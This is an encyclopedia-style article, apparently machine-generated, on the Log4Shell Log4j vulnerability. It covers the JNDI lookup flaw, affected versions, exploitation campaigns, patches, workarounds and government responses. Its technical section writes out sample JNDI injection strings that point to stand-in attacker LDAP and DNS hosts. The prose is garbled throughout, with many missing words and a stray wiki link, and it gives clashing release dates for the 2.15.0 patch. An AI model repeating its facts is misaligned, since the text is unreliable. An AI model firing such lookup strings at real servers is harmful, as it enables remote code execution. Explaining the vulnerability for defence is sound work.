Fact-checked by Grok 2 weeks ago

Log4Shell

Log4Shell, formally identified as CVE-2021-44228, is a remote code execution vulnerability in the Apache 2 Java logging library, enabling attackers to inject specially crafted log messages that trigger lookups from malicious remote servers via the Java Naming and Directory Interface (JNDI), thereby loading and executing arbitrary code on vulnerable systems. The flaw affects versions from 2.0-beta9 to 2.14.1, which incorporate message lookup substitution by default, allowing exploitation without authentication when an attacker controls input to logging functions. Discovered in late November 2021 and publicly detailed in early December, Log4Shell was assigned the highest possible severity score of 10.0 under the CVSS v3.1 metric due to its trivial exploitability, broad , and potential for complete system compromise. responded swiftly with patches, initially in 2.15.0 on December 6, 2021, followed by refinements in subsequent releases up to 2.17.0 to address related flaws like CVE-2021-45046 and CVE-2021-45105. The vulnerability's scope amplified its threat, as underpins countless Java applications across , cloud infrastructure, and , resulting in exploitation attempts starting around December 1, 2021, and prompting emergency directives from agencies including CISA for federal systems. Mitigations emphasized upgrading to patched versions, disabling JNDI lookups, and scanning for vulnerable instances, though incomplete adoption highlighted persistent challenges in open-source dependency management.

Discovery and Historical Context

Initial Detection and Disclosure

The Log4Shell vulnerability, designated CVE-2021-44228, was first identified by Chen Zhaojun, a security researcher at Alibaba Cloud's security team, who privately reported it to the Apache Software Foundation on November 24, 2021. This initial detection stemmed from observations of anomalous server behavior traced to Log4j's JNDI lookup mechanism, though Apache initially assessed the risk as moderate during early triage. Public disclosure occurred on December 9, 2021, when proof-of-concept exploit code was shared online, prompting widespread awareness and immediate scrutiny of Log4j deployments. The vulnerability received its official CVE identifier, CVE-2021-44228, from on December 10, 2021, reflecting the rapid escalation from private report to global alert. In the ensuing days, released version 2.15.0 on December 6, 2021, as an initial patch, but this fix proved incomplete, leading to the disclosure of related CVE-2021-45046 on December 14, 2021, which addressed denial-of-service and other non-default risks in the . These sequential revelations highlighted the challenges in fully remediating the core flaws amid ongoing analysis.

Development of Log4j and Preceding Risks

Apache originated as an open-source logging framework for Java applications, with its first version released in January 1999 by Ceki Gülcü under the Apache Software Foundation. Log4j 1.x became a due to its configurable levels, appenders for output destinations, and layout options for message formatting, addressing the limitations of Java's built-in which lacked flexibility and performance. By the early , demands for better multithreading support and efficiency prompted the development of Log4j 2, a complete rewrite that introduced asynchronous to reduce in high-throughput environments. Log4j 2.0-beta9, released on July 18, 2013, marked a significant evolution by incorporating plugin-based , including initial support for the Java Naming and Directory Interface (JNDI) in lookup mechanisms. This allowed logging configurations to dynamically resolve variables from external directories or LDAP servers, enhancing modularity for enterprise deployments but introducing unmitigated risks from unsanitized lookups. The full stable release of Log4j 2.0 occurred in August 2014, followed by general availability of version 2.0 in July 2015, with ongoing enhancements focusing on garbage collection efficiency and integration with Java 8 features like expressions. The library's ubiquity in Java ecosystems stemmed from its superior performance—up to 18 times faster than Log4j 1.x in benchmarks—and extensibility, making it integral to frameworks such as Apache Struts, , and Hadoop. Developers favored it for tunable verbosity, support for structured logging formats like , and seamless embedding in or builds, leading to its inclusion in countless server-side applications by the mid-2010s. Preceding risks in libraries, including , primarily involved denial-of-service via excessive log volume or configuration errors, but overlooked the amplification potential of dynamic features like JNDI, which assumed trusted environments and did not enforce input validation for remote interactions. Earlier CVEs in Log4j 1.x, such as integer overflows in pattern parsing (CVE-2010-1624), highlighted parsing flaws but never escalated to remote code execution at scale, as was not designed for adversarial input processing.

Technical Mechanism

Core Vulnerability Behavior

The core vulnerability in Log4Shell, CVE-2021-44228, originates in Log4j's message lookup substitution mechanism, which processes placeholders within log messages or parameters to dynamically resolve values during . Log4j employs the MessageLookup class to handle these substitutions for patterns like ${key:...}, supporting various lookup types including the Java Naming and Directory Interface (JNDI) by default. This feature allows resolution of external resources via protocols such as LDAP or RMI, but in vulnerable configurations, it performs lookups without validating the source or requiring authentication, enabling remote resource fetching from arbitrary endpoints. When untrusted input containing a crafted JNDI —such as ${jndi:ldap://remote-[server](/page/Server)/object}—is incorporated into a log , Log4j's substitution engine triggers a JNDI query to the specified remote during . The attacker-controlled can respond with a malicious object or serialized , which the JNDI provider then deserializes and executes in the context of the logging application's (JVM), resulting in . This bypasses standard input sanitization because logging typically assumes post-processing safety, treating the input as inert text rather than executable directives. Exacerbating the issue is the recursive substitution capability, where resolved lookup values can embed further placeholders, allowing nested evaluations without depth limits in default settings. This recursive behavior, combined with JNDI's lack of inherent protections against adversary-controlled lookups in Log4j's implementation, transforms a legitimate configuration flexibility into a vector for unauthenticated remote code loading and execution directly within the application's process.

JNDI Lookup Exploitation

The JNDI lookup exploitation in Log4j 2 relies on the library's message substitution mechanism, which recursively evaluates embedded lookup strings during logging. When an application logs untrusted input containing a specially crafted string, such as ${jndi:ldap://attacker-controlled-server.com/malicious}, Log4j's JndiLookup class processes the ${jndi:...} pattern by invoking Java's Naming and Directory Interface (JNDI) to perform a remote lookup against the specified provider URL. This initiates a network request to the attacker's infrastructure, where the server responds with a serialized Java object, often a Reference instance configured to reference a malicious class or invoke a gadget chain upon instantiation. Upon receiving the response, deserializes the object using JNDI's NamingManager.getObjectInstance() method, which triggers the execution of the referenced code through dynamic class loading or factory callbacks, resulting in remote code execution (RCE) on the victim host. This process exploits JNDI's lack of inherent restrictions on remote code retrieval, allowing attackers to host payloads on LDAP, RMI, or other supported protocol servers without authentication. Variants of the attack leverage alternative JNDI protocols beyond LDAP, such as RMI for direct object references or IIOP for CORBA interoperability, enabling payload delivery in environments blocking LDAP traffic. Attackers may also chain exploits with Java deserialization gadgets, where the returned Reference object uses a custom to instantiate vulnerable classes from libraries like Collections, amplifying code execution depth. For , DNS-based lookups like ${jndi:dns://attacker.com/probe} can confirm vulnerability without RCE, as they trigger resolvable queries revealing live targets. The vulnerability stems from Log4j's foundational assumption that lookup inputs derive from trusted, internal contexts, overlooking the causal risks in networked applications where external data routinely enters pipelines without . JNDI's permissive design, intended for in controlled environments, did not enforce remote lookup safeguards, enabling adversary-controlled servers to supply executable content unchecked. This misalignment between logging's diagnostic intent and JNDI's remote invocation capabilities exposed systems to supply-chain-like attacks via unvalidated message patterns.

Affected Versions and Variants

The core Log4Shell vulnerability, designated CVE-2021-44228, affects Apache versions from 2.0-beta9 through 2.14.1, enabling remote code execution via malicious JNDI lookups in log messages. Version 2.15.0, released on December 6, 2021, introduced partial mitigations by disabling JNDI by default and restricting lookups to the message context, but these measures proved incomplete against certain exploitation variants, particularly in non-default configurations allowing external lookups. Follow-on vulnerabilities emerged as refinements to the initial patches. CVE-2021-45046, disclosed on December 14, 2021, involves denial-of-service escalation through thread-context lookups and affects versions 2.0-beta9 through 2.15.0, even after the CVE-2021-44228 mitigation attempt. Subsequently, CVE-2021-45105, identified on December 18, 2021, permits denial-of-service via infinite in self-referential lookups and impacts versions from 2.0-alpha1 through 2.16.0 (excluding 2.12.3, which lacks the vulnerable pattern). These related flaws, while not enabling like the original, highlight cascading risks in the lookup mechanism and underscore the need to differentiate core remote code execution from auxiliary denial-of-service vectors in assessments.
CVE IDDescriptionAffected VersionsFixed Version
CVE-2021-44228Remote code execution via JNDI2.0-beta9 to 2.14.12.15.0 (partial)
CVE-2021-45046DoS via thread-context lookups2.0-beta9 to 2.15.02.16.0
CVE-2021-45105 via infinite 2.0-alpha1 to 2.16.0 (excl. 2.12.3)2.17.0
versions prior to 2.0-beta9 and after 2.17.0 remain unaffected by these specific issues, though comprehensive auditing of dependencies is required due to the library's widespread embedding in applications.

Scope of Exposure

Prevalence in Software Ecosystems

Apache Log4j has been a foundational logging library in the Java ecosystem since 1999, serving as the default or integrated mechanism in numerous frameworks and enterprise applications, including Struts, , , Kafka, Druid, and Flink. Its ubiquity arises from transitive dependencies in software supply chains, where it is bundled indirectly through higher-level libraries, embedding it in billions of lines of code across Java-based systems without explicit developer awareness. In , the primary repository for artifacts, over 17,000 packages—approximately 4% of the total—depended on vulnerable versions as of December 2021, with only about 3,500 featuring direct inclusion and the majority (over 13,500) relying on transitive chains often deeper than five levels. This structure exacerbates risks, as dependency graphs obscure 's presence in non-obvious products like cloud services, devices, and , hindering automated scanning and manual audits. Nearly 7,000 open-source projects explicitly used as a , underscoring its entrenchment beyond direct logging needs. Pre-patch analyses revealed extensive exposure, with estimates of hundreds of millions of potentially affected devices worldwide and up to 93% of enterprise environments vulnerable due to Log4j's in workloads spanning machines, containers, and serverless functions. Such prevalence highlights systemic challenges in open-source dependency management, where libraries like propagate unchecked across ecosystems.

Notable Affected Applications and Services

Java Edition servers incorporated vulnerable versions of for logging player interactions and events, enabling remote code execution attempts via crafted usernames during connection attempts. Mojang confirmed the exposure on December 10, 2021, following the public disclosure of CVE-2021-44228. Apple backend services relied on affected components, rendering email and other server-side functionalities susceptible to exploitation as identified by security scanning tools and researcher probes in early December 2021. (AWS) services, including and certain containerized applications, embedded dependencies that triggered widespread internal scans and hot-patching efforts upon vulnerability revelation. IBM enterprise products such as , tools, and Application Performance Management suites utilized , exposing them to the flaw and prompting product-specific investigations starting December 2021. products including SE, Fusion Middleware, and database components integrated vulnerable libraries, as detailed in official security alerts issued to address remote code execution risks without authentication.

Exploitation Patterns

Proof-of-Concept and Early Attacks

A proof-of-concept exploit for CVE-2021-44228, dubbed Log4Shell, was publicly released on on December 9, 2021, demonstrating remote code execution via malicious JNDI lookups in vulnerable Log4j instances. This rapid weaponization triggered widespread internet scanning for vulnerable systems starting as early as December 9, with mass attempts surging by December 10 from diverse IP addresses probing for usage. Honeypot deployments captured a peak in exploit attempts during mid-December 2021, including payloads delivering via LDAP or RMI callbacks, though many failed due to incomplete chains or rapid vendor patching. Opportunistic actors adapted existing tools quickly; for instance, a Mirai variant incorporating Log4Shell for propagation emerged by December 20, 2021, targeting exposed applications to expand infected hosts. Nation-state actors, including Chinese group APT41, initiated probes within hours of disclosure, scanning and attempting compromises against government and targets, yet initial footholds remained limited as organizations deployed patches and workarounds at unprecedented speed following the advisory. This swift response constrained early attack success, with most attempts resulting in rather than persistent access.

State-Sponsored and Criminal Exploitation

State-sponsored actors linked to exploited Log4Shell (CVE-2021-44228) to target U.S. federal systems, including a of a federal civilian executive branch agency where Iranian hackers deployed cryptocurrency miners following initial access via the vulnerability. Iranian (APT) groups, such as those affiliated with the , conducted reconnaissance and exploitation attempts on publicly exposed applications to facilitate and persistence, often in pursuit of against Israeli and U.S. targets. Similarly, Chinese state-affiliated actors leveraged the vulnerability for initial access in campaigns, with intelligence observations confirming exploitation attempts shortly after disclosure on December 9, 2021. Criminal actors, including ransomware operators, integrated Log4Shell into their toolkits for opportunistic initial access, scanning vulnerable servers to deploy payloads such as Strike beacons for command-and-control and lateral movement. These groups prioritized high-value targets like enterprise applications, using the exploit to facilitate deployment, though attribution to specific ransomware families like Conti or remains indirect through shared in underground forums. Cryptocurrency miners were also observed as secondary payloads in criminal exploit chains, particularly in unpatched environments, enabling profit-driven resource hijacking post-compromise. Despite widespread scanning—exceeding billions of attempts globally in the weeks following disclosure—successful exploitations by both state and criminal actors post-patching remained empirically low, attributed to rapid vendor updates, , and endpoint detection limiting payload execution rates to under 1% of probes in monitored environments. This contrasts with initial hype around catastrophic potential, as intelligence reports from firms like and noted that defensive measures disrupted most chains, with confirmed intrusions confined to a fraction of exposed assets.

Persistent Vulnerabilities Post-Patch

As of December 2024, approximately 12% of applications continue to run vulnerable versions of the library, exposing them to Log4Shell exploitation, according to analysis by Contrast Security. Similarly, Sonatype reported that 13% of active installations and downloads in 2024 involved known vulnerable versions, despite fixes being available for over 94% of such components. These figures reflect scans of production environments and open-source repositories, highlighting the incomplete remediation three years after disclosure. The persistence stems primarily from legacy enterprise applications where is deeply embedded across multilayered dependencies, complicating identification and upgrades without risking operational disruptions. Critical vulnerabilities like Log4Shell have taken over 500 days on average to remediate in many cases, with 80% of application dependencies remaining un-updated for more than a year, even when patches exist. Limited visibility exacerbates this, as uneven adoption of software bills of materials (SBOMs)—with nearly half of organizations falling behind on implementation—hampers tracking of transitive dependencies and hidden components. Exploitation attempts against unpatched instances continued into 2024 and early 2025, including opportunistic campaigns using obfuscated LDAP requests for and persistence, as well as over 4,000 probes per application detected in November 2024. The U.S. (CISA) listed Log4Shell among the top 15 most exploited vulnerabilities of 2023, with ongoing scans by threat actors targeting exposed services. However, the severity of successful breaches has diminished in modern environments due to layered defenses, such as and web application firewalls, which block JNDI lookups even in vulnerable setups.

Mitigation Strategies

Official Patches and Updates

released Log4j version 2.15.0 on December 9, 2021, as the initial patch for CVE-2021-44228, which implemented a default denial of JNDI lookups in log messages to mitigate remote code execution via LDAP and similar protocols. However, this fix had limitations, as it did not fully block JNDI lookups in certain contexts like message lookups or threaded contexts, allowing potential exploitation through non-LDAP protocols such as RMI or DNS. In response to newly identified issues in 2.15.0 (CVE-2021-45046), issued 2.16.0 on December 14, 2021, expanding protections by blocking all JNDI lookups by default regardless of context and removing the JndiLookup class from the default . This addressed denial-of-service risks and further variants but still required full upgrades for comprehensive , as configuration-based allowances could reintroduce vulnerabilities if not strictly managed. Subsequent releases, including Log4j 2.17.0 on December 17, 2021, provided additional hardening against related denial-of-service flaws (CVE-2021-45105) via recursive lookup protections and were deemed sufficient to resolve the core issues for 8 and later environments. For legacy versions, parallel branches like 2.12.3 (January 2022) and later offered equivalent fixes. emphasized upgrading to the latest versions over temporary configuration changes, noting that partial mitigations like setting log4j2.formatMsgNoLookups=true were unreliable against sophisticated attacks and did not address all exploitation vectors. Follow-up patches, such as 2.17.1 (December 28, 2021) for CVE-2021-44832 and ongoing releases through 2022, ensured coverage of variant exploits involving serialized data or custom configurations, with verification recommended via CVE databases and official changelogs. Affected users were advised to scan dependencies using tools like or to confirm upgrades, as incomplete patching left systems exposed to persistent threats despite early fixes.

Temporary Workarounds

One primary temporary workaround involves configuring 2 to disable JNDI lookups within log message formatting by setting the system property log4j2.formatMsgNoLookups=true, which can be applied via JVM startup flags such as -Dlog4j2.formatMsgNoLookups=true or the LOG4J_FORMAT_MSG_NO_LOOKUPS=true. This prevents the vector where attacker-controlled input in log messages triggers remote JNDI lookups leading to remote code execution, as observed in CVE-2021-44228. Effectiveness relies on the property propagating to all affected instances in the application , particularly for versions 2.0 through 2.14.1, though it does not address non-message-based lookups or subsequent variants like CVE-2021-45046. At the network level, organizations implemented rules to block outbound connections from affected servers to common JNDI protocols such as LDAP (ports 389/636), RMI (ports 1099/1098), and DNS, thereby interrupting the retrieval phase of attacks even if initial lookups occur. This approach provided empirical containment in environments where application restarts were infeasible, as evidenced by reduced exploit success rates in scanned infrastructures during the vulnerability's peak disclosure period in December 2021. These measures entail trade-offs, including potential minor performance degradation from disabled message lookup optimizations—though quantified impacts were generally negligible in benchmarks—and incomplete coverage against bypass techniques or Log4j configurations bypassing the flag, necessitating complementary monitoring for anomalous outbound traffic. They served as stopgap defenses for legacy or unpatchable systems but deferred full remediation risks to patching.

Dependency Management Practices

Software dependency management practices emphasize achieving comprehensive visibility into third-party components, including transitive dependencies, to preempt vulnerabilities akin to Log4Shell (CVE-2021-44228), which often propagated indirectly through libraries like Apache Log4j. Transitive dependencies, pulled in automatically by direct ones, amplified Log4Shell's reach, underscoring the need for explicit controls rather than relying on default resolution mechanisms. A foundational practice is adopting a Software (SBOM), an inventory listing all software components, their versions, and relationships, which enables organizations to map and assess risks from embedded libraries like without manual auditing. SBOMs facilitate quicker during vulnerability disclosures by highlighting affected elements in complex supply chains. Automated scanning tools, such as Dependency-Check, integrate into build processes to detect known vulnerabilities by cross-referencing dependencies against databases like the (NVD). This tool proved effective in identifying exposures during the incident, generating reports on common platform enumeration (CPE) matches for CVEs. To counter transitive risks, version pinning declares exact dependency versions in manifests (e.g., via Maven's <version> tags or 's constraints), preventing automatic upgrades to unvetted releases that might introduce flaws. For Log4j cases, pinning overrides vulnerable transitive pulls, as seen in configurations enforcing safe versions across the . Incorporating these into / (CI/CD) pipelines ensures routine scans and updates, with tools enforcing policy checks before deployment. Post-Log4Shell evaluations highlight that mature (SCA) implementations correlate with faster vulnerability detection and fewer persistent exposures in production environments.

Organizational and Governmental Responses

Vendor and Developer Remediation

Following the public disclosure of the Log4Shell vulnerability (CVE-2021-44228) on December 9, 2021, major cloud vendors rapidly issued alerts to their customers. AWS published its initial bulletin on December 10, 2021, at 7:20 PM PDT, detailing affected services such as Amazon EC2 and providing guidance. followed on December 11, 2021, with comprehensive guidance on prevention, detection, and hunting for exploitation in its products and services. These timely notifications enabled enterprise developers to initiate scanning and patching workflows, often integrating automated tools for dependency analysis in environments. Open-source maintainers and developers coordinated remediation through informal channels, including extensive use of platforms for sharing detection scripts, workaround configurations, and upgrade paths. The released the initial patch as version 2.15.0 on December 10, 2021, with subsequent updates addressing related flaws. This cooperation, as assessed in the Cyber Safety Review Board's July 2022 report, demonstrated high levels of information-sharing that minimized widespread chaos despite the vulnerability's pervasiveness in supply chains. Developers encountered significant hurdles in applying patches to legacy systems, where binary compatibility concerns often delayed upgrades. Updating from vulnerable versions (e.g., 2.0-beta9 to 2.14.1) to 2.15.0 or later risked breaking existing applications due to changes in library behavior or dependencies, particularly in environments with unmaintained third-party integrations or older runtimes. Such issues necessitated extensive testing and, in some cases, custom recompilation, prolonging exposure in stacks reliant on outdated codebases.

Regulatory and Advisory Actions

The U.S. (CISA) issued a joint cybersecurity advisory on December 22, 2021, titled "Mitigating Log4Shell and Other Log4j-Related Vulnerabilities," urging organizations to identify affected instances, apply patches or workarounds, and initiate incident response for exploitation attempts. Earlier, on December 17, 2021, CISA released Directive 22-02, mandating branch agencies to mitigate the vulnerability by December 24, 2021, including scanning networks and applying mitigations, while adding CVE-2021-44228 to its Known Exploited Vulnerabilities Catalog to prioritize remediation. On January 4, 2022, the (FTC) warned businesses relying on to promptly remediate the flaw, stating that failure to take reasonable security measures could invite FTC enforcement actions under Section 5 of the FTC Act if it leads to consumer harm, though the guidance emphasized voluntary patching over immediate regulatory overreach. Internationally, the UK's National Cyber Security Centre (NCSC) issued an alert on Apache Log4j vulnerabilities shortly after disclosure, recommending organizations prioritize scanning for vulnerable versions, applying updates to 2.17.0 or later, and implementing network-level blocks on JNDI lookups as interim measures, with a focus on voluntary best practices rather than binding mandates. Similar guidance emerged from partners like Canada's Centre for Cyber Security, which aligned with the U.S. joint advisory to promote asset inventorying and without imposing sector-specific regulations. These efforts highlighted a coordinated, advisory approach emphasizing shared and self-remediation across borders. Despite widespread issuance of these alerts and reported high initial compliance among alerted entities, such as federal agencies meeting CISA deadlines, exploitation persisted into 2023 and beyond, with security firm Contrast Security finding that 12% of scanned applications remained vulnerable to flaws as of late 2024, and reporting as a top that year. This outcome underscores the limitations of regulatory advisories in achieving comprehensive security gains, as voluntary measures yielded surface-level cooperation but failed to eliminate unpatched systems in complex supply chains, where dependency scanning and enforcement gaps allowed vulnerabilities to linger.

Business Sector Disruptions

The disclosure of Log4Shell on December 9, 2021, triggered urgent operational scrambles across major corporations, including companies, as security teams worked through the subsequent weekend to scan environments and deploy mitigations against the remote code execution in Apache Log4j. Hyperscalers such as and other cloud providers issued emergency patches and advisories within days, diverting engineering resources from routine operations to prioritize hunting in Java-based applications ubiquitous in enterprise stacks. Remediation efforts imposed significant financial burdens, with average incident response costs for Log4Shell compromises exceeding $90,000 per event, often involving ransomware exploitation by groups like and Conti. Global damages were estimated in the hundreds of millions of dollars, encompassing scanning tools, overtime labor, and temporary workarounds like Web Application Firewalls, while security teams logged hundreds of thousands of overtime hours amid widespread risks. Many organizations suspended non-critical projects for 2-3 weeks to focus solely on Log4j inventories, exacerbating short-term productivity losses in sectors reliant on affected software. Supply chain effects amplified disruptions, as enterprises struggled to verify Log4j usage in third-party components and platforms, where vendor self-assessments proved unreliable and delayed coordinated updates. This led to cascading delays for clients dependent on providers, who faced extended vulnerability exposure windows during patch validation and propagation across ecosystems. In response, the acute competitive pressures prompted faster-than-typical vendor fixes, with market incentives driving proactive disclosures and remediations that outpaced the timelines often seen in regulation-dependent scenarios.

Broader Impacts and Analysis

Immediate Security and Economic Consequences

Following its public disclosure on December 9, 2021, the Log4Shell vulnerability (CVE-2021-44228) prompted immediate and widespread exploitation attempts by threat actors seeking to identify and compromise vulnerable Apache Log4j instances. By December 10, 2021, cybersecurity firms reported active scanning and opportunistic attacks, including HTTP requests embedding malicious JNDI lookups in headers like User-Agent and Referer fields. Palo Alto Networks' Unit 42 observed over 125 million hits indicative of Log4Shell-related activity from December 10, 2021, through early 2022, with a peak spike between December 12 and 16 dominated by mass reconnaissance scans rather than confirmed payloads. The U.S. Federal Bureau of Investigation noted similar scanning campaigns aimed at deploying cryptominers and other malware, though successful remote code executions remained rare in the initial days due to the Apache Software Foundation's rapid release of patch version 2.15.0 on December 9 and subsequent community-driven mitigations like configuration changes. By mid-December, ransomware operators such as Conti had incorporated Log4Shell into their toolkits, but public reports of large-scale breaches were minimal, with most incidents contained through urgent patching and monitoring. Economically, the triggered a global remediation frenzy, with organizations expending resources on vulnerability scanning, code audits, and dependency updates across millions of Java-based applications. and estimated the total short-term costs, including emergency responses and assessments, at over $2 billion worldwide. Per-incident remediation averaged more than $90,000, factoring in labor for identifying affected systems and deploying workarounds, though these figures were mitigated by the open-source community's swift coordination. Secondary risks included privacy exposures from logged exploit strings, which could inadvertently record attacker-controlled domains or system details during JNDI resolution attempts, but these were subordinate to the core threat of .

Long-Term Lessons on Supply Chain Security

The Log4Shell vulnerability exposed pervasive "dependency blindness" in software ecosystems, where transitive dependencies in open-source libraries like Apache Log4j often go untracked, amplifying risks across millions of applications. This incident prompted a push for mandatory Software Bills of Materials (SBOMs) to provide verifiable inventories of components, enabling rapid vulnerability mapping; U.S. 14028 accelerated SBOM requirements for federal suppliers, yet 2024 analyses reveal uneven adoption, with only partial implementation in many enterprises despite heightened awareness. Sonatype's 2024 report on over 7 million open-source projects notes improved automated scanning tools but persistent gaps in SBOM generation and sharing, leaving 90% of software—dominated by open-source elements—vulnerable to unmonitored risks like malicious package insertions, which rose 156% year-over-year. Sustaining open-source security demands targeted funding for maintainer resources, including security audits and rapid patching, without layering on regulatory bloat that could stifle innovation; Log4j's understaffed project exemplified how volunteer-driven efforts falter under scale, contributing to the flaw's evasion of pre-release detection. Post-incident reviews, such as the U.S. Cybersecurity and Infrastructure Security Agency's board analysis, advocate streamlined incentives like corporate sponsorships or government grants focused on core hygiene practices over expansive oversight. Layered runtime defenses, including Web Application Firewalls (WAFs) and , emerged as essential complements to patching, intercepting Log4Shell exploits via behavioral analysis even in legacy deployments. These tools blocked remote code execution attempts by validating inputs at execution time, reducing reliance on perfect upstream fixes; empirical data from the event showed WAF rules mitigating attacks across cloud providers, underscoring their role in causal resilience against zero-day supply chain threats.

Criticisms of Open-Source Practices

The JNDI lookup feature enabling was introduced in Apache version 2.0-beta9 in 2013 via issue LOG4J2-313, yet risks of remote code execution through dynamic resolution were not prioritized amid volunteer-driven development lacking rigorous, ongoing audits. In open-source projects like , maintained primarily by unpaid contributors, testing often focuses on functionality over exhaustive , allowing latent flaws to persist for years without detection or mitigation. Transitive dependencies exacerbated supply chain opacity, as Log4j's integration into countless applications via indirect library chains evaded developer scrutiny, permitting unchecked propagation of unvetted code across ecosystems. This reliance on opaque, volunteer-maintained libraries critiques the absence of mandatory provenance verification, where organizations inherit risks without visibility into upstream security practices. While Apache's swift release of patches following the December 9, 2021 disclosure—upgrading to version 2.15.0 within hours—limited some exploitation, the episode reveals systemic underfunding in open-source , fostering maintainer and deferred hardening that national infrastructures cannot sustainably tolerate. Critics contend this model incentivizes minimal viable contributions over resilient design, though it avoids attributing fault to downstream users navigating inherited complexities.

References

  1. [1]
    NVD - CVE-2021-44228
    No readable text found in the HTML.<|separator|>
  2. [2]
  3. [3]
    Mitigating Log4Shell and Other Log4j-Related Vulnerabilities | CISA
    Dec 23, 2021 · Log4Shell and CVE-2021-45046—rated as critical vulnerabilities by Apache—are severe because Java is used extensively across IT and OT platforms, ...
  4. [4]
    Log4shell Vulnerability is the Coal in Our Stocking for 2021 - Trellix
    The bug was originally disclosed to Apache on November 24 by Chen Zhaojun of Alibaba Cloud Security Team. The impact of this vulnerability has the potential ...
  5. [5]
    Apache Log4j Vulnerability Guidance - NJCCIC - NJ.gov
    Dec 30, 2021 · November 24, 2021: Alibaba Cloud researcher Chen Zhaojun privately reported Log4j vulnerability to Apache Software Foundation, who began ...
  6. [6]
    Log4j vulnerability explained: What is Log4Shell? - Dynatrace
    Apr 25, 2024 · They discovered the attack December 9 on servers that host the game Minecraft. After further forensic analysis, they realized cybercriminals ...
  7. [7]
    CVE-2021-44228 - Log4j RCE 0-day mitigation - The Cloudflare Blog
    Dec 10, 2021 · A zero-day exploit affecting the popular Apache Log4j utility (CVE-2021-44228) was made public on December 9, 2021 that results in remote code execution (RCE).Missing: disclosure | Show results with:disclosure
  8. [8]
    The Log4j Log4Shell vulnerability: Overview, detection, and ...
    Dec 14, 2021 · The vulnerability is tracked as CVE-2021-44228 and is a remote code execution vulnerability that can give an attacker full control of any impacted system.<|separator|>
  9. [9]
    The Log4j Timeline of Events (Plus a New Vulnerability) - Automox
    November 24 - Security researcher Chen Zhaojun discovers the now infamous CVE-2021-44228, or “Log4Shell,” vulnerability that allows unauthenticated ...
  10. [10]
  11. [11]
    Apache log4j Vulnerability CVE-2021-44228: Analysis and Mitigations
    Dec 10, 2021 · Description of the Vulnerability (CVE-2021-44228) The Apache log4j library allows for developers to log various data within their application. ...Executive Summary · Description of the Vulnerability... · Exploit · Observed Activity
  12. [12]
    What is the Log4j Vulnerability? - IBM
    Apache released a second patch (Log4J version 2.16.0) on 14 December 2021. It too had a flaw, CVE-2021-45105, which allowed hackers to start denial of service ( ...
  13. [13]
    Release notes :: Apache Log4j
    This minor release introduces bug fixes, behavior improvements, and complete support for GraalVM native image generation.2.17.2 · 2.11.2 · 2.8.2 · 2.6.2
  14. [14]
    Apache Log4j Vulnerability Guidance - CISA
    Apr 8, 2022 · ... Log4j library, versions 2.0-beta9 to 2.14.1—exists in the action the Java Naming and Directory Interface (JNDI) takes to resolve variables.
  15. [15]
    Digging deeper into Log4Shell - 0Day RCE exploit found in Log4j
    Dec 10, 2021 · The jndi : URI trigger must be logged by Log4j to exploit the bug. We have observed attackers inserting the string into a variety of HTTP ...
  16. [16]
    Exploiting, Mitigating, and Detecting CVE-2021-44228: Log4j ...
    Dec 15, 2021 · The CVE-2021-44228 is a CRITICAL vulnerability that allows attackers to execute arbitrary code on a machine. Updating log4j to 2.16.0.
  17. [17]
    Log4Shell : JNDI Injection via Attackable Log4J - Qwiet AI
    In summary, the attacks steps are: Inject the malicious JNDI LDAP URL, ${jndi:ldap://attackerserver.com:1389/ExploitPayload}, into application input that will ...
  18. [18]
    Guidance for preventing, detecting, and hunting for exploitation of ...
    Dec 11, 2021 · This blog reports our observations and analysis of attacks that take advantage of the Log4j 2 vulnerabilities.
  19. [19]
    Log4Shell Initial Exploitation and Mitigation Recommendations
    Dec 15, 2021 · We provide an overview of how Log4j impacts organizations, share how attackers have leveraged it in the wild, and provide mitigation ...
  20. [20]
    The Long Tail of Log4Shell Exploitation - Horizon3.ai
    Jul 13, 2022 · For the first step, to verify the JNDI lookup injection point, we used the DNSLog service at dnslog.cn to catch DNS callbacks from the ...
  21. [21]
    Log4j: Letting the JNDI out of the bottle - Hurricane Labs
    Dec 15, 2021 · Trust Issues​​ This feature would allow the Java application to remotely load any Java class file it was instructed to load. As mentioned above, ...Intro To Log4j2 Lookups · Settings · Mitigations And Remediation
  22. [22]
    Log4j vulnerability explained: Prevent Log4Shell RCE by updating ...
    Dec 10, 2021 · Many application frameworks in the Java ecosystem use this logging framework by default. For instance, Apache Struts 2, Apache Solr, and Apache ...
  23. [23]
    [PDF] CSRB Report on Log4j - CISA
    Jul 11, 2022 · Third, there is a real need to drive widespread development and adoption of capabilities, tooling, and automated frameworks that support ...
  24. [24]
    Understanding the Impact of Apache Log4j Vulnerability
    Dec 17, 2021 · As of December 16, 2021, we found that over 17,000 of the available Java artifacts from Maven Central depend on the affected log4j code. This ...Missing: inclusion statistics
  25. [25]
    Log4Shell 10 days later: Enterprises halfway through patching - Wiz
    Dec 20, 2021 · While 93% of all cloud environments are at risk from Log4Shell, on average organizations have patched 45% of their vulnerable cloud resources by Day 10.
  26. [26]
    Important Message: Security vulnerability in Java Edition - Minecraft
    Dec 10, 2021 · Hello everyone! Earlier today, we identified a vulnerability in the form of an exploit within Log4j – a common Java logging library.Missing: statement | Show results with:statement
  27. [27]
    Security Vulnerability in Minecraft: Java Edition
    This article only applies to Minecraft: Java Edition. We have identified a vulnerability in the form of an exploit within Log4j – a common Java logging library.
  28. [28]
    Apple iCloud, Twitter and Minecraft vulnerable to 'ubiquitous' zero ...
    Dec 10, 2021 · Companies with servers confirmed to be vulnerable to Log4Shell attack so far include Apple, Amazon, Cloudflare, Twitter, Steam, Baidu ...
  29. [29]
    Update for Apache Log4j2 Security Bulletin (CVE-2021-44228) - AWS
    Dec 17, 2021 · The Amazon Inspector service is patched against the Log4j issue. The Inspector service helps detect CVE-2021-44228 (Log4Shell) issues within ...
  30. [30]
    PSIRT NEWS: An update on the Apache Log4j 2.x vulnerabilities - IBM
    IBM is actively responding to the remote code execution vulnerability in the Apache Log4j 2 Java library dubbed Log4Shell (or LogJam). We are investigating and ...
  31. [31]
    Security Bulletin: Multiple vulnerabilities in Apache Log4j affect IBM ...
    Sep 25, 2023 · Apache Log4j is used by IBM Application Performance Management. The vulnerabilities in the product component have been addressed.<|control11|><|separator|>
  32. [32]
    Oracle Security Alert Advisory - CVE-2021-44228
    This Security Alert addresses CVE-2021-44228, a remote code execution vulnerability in Apache Log4j. It is remotely exploitable without authentication.
  33. [33]
    Trending: Apache Log4j Vulnerability | Cybersecurity Blog | GreyNoise
    Trending Internet Scanning on ... On December 9th, weaponized proof-of-concept exploits (PoCs) began to appear, leading to a rapid increase of scanning and public exploitation on December 10th.Missing: early | Show results with:early
